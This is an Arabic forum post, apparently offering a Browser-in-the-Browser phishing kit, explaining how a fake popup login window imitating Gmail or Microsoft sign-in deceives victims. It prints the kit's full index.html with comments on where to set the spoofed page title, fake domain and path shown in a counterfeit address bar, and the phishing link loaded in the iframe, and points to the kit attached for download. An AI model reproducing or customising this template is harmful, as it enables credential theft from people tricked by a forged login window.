تقنية هجوم المتصفح فى المتصفح الأصلى BITB

x32x01 · الأمس في 19:35

ما هي تقنية هجوم المتصفح فى المتصفح الأصلى ؟
أخليكم مع الصوره تشرح نفسها:

حسنًا للتوضيح :
الفكرة عندما تقوم بفتح موقع مثلاً وتحاول تسجيل الدخول باستخدام حساب gmail أو مايكروسوفت تقوم بضغط على تسجيل دخول، لكن هنا النافذه منبثقة عبارة عن "صفحة مزورة"

نعم صديقي

إنها صفحة مزورة وتوجد ثيمات تشابهه نظامين (ويندوز - ماك أو أس ) ويمكنك تعديل على النافذة المنبثة بشكل كامل حتى أنه يمكنك تغير الرابط .

عند فتح الضغط عن الملف سوف تجد عدة ملفات كل ملف عبارة عن ثيم للنافذه المنبثة

سوف اختار ملف Windows-DarkMode-Delay
عندما تقوم بفتح السورس كود ستجد التالي (index.html)

استكمال الشرح داخل السورس:

HTML:

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="style.css">
        <script
            src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    </head>
    <body>
        <button id="clickme"
            style="margin-left:auto; margin-right: auto; margin-top: 2.5%; text-align: center; display: block;">Click
            me</button>
        <div id="window"
            style="margin:auto; position: relative; bottom: 2.5%; display: none;">
            <!-- Title bar start -->
            <div id="title-bar-width">
                <div id="title-bar">
                    <div style="margin-top:5px;">
                        <img src="./logo.svg" width="20px" height="15px"
                            id="logo"> <!-- ايقونه الموقع  -->
                        <span id="logo-description">XX-TITLE-XX</span>
                        <!-- اسم الصفحة المراد تزويرها -->
                    </div>
                    <div>
                        <span id="minimize">&#8212;</span>
                        <span id="square">□</span>
                        <span id="exit">✕</span>
                    </div>
                </div>
                <div id="url-bar">
                    <img src="./ssl.svg" width="20px" height="20px"
                        id="ssl-padlock">
                    <span
                        id="domain-name">XX-DOMAIN-NAME-XX</span><!-- الدومين فقط مثال (www.google.com)  -->
                    <span id="domain-path">XX-DOMAIN-PATH-XX</span>
                    <!-- تكلمة العنوان مثال (login) -->
                </div>
            </div>
            <!-- Content start -->
            <iframe id="content" src="XX-PHISHING-LINK-XX"
                frameBorder="0"></iframe>
            <!-- رابط صفحة الاصلية المراد استنساخها  -->
        </div>
    </body>
    <script src="script.js"></script>
</html>

التحميل: فى المرفقات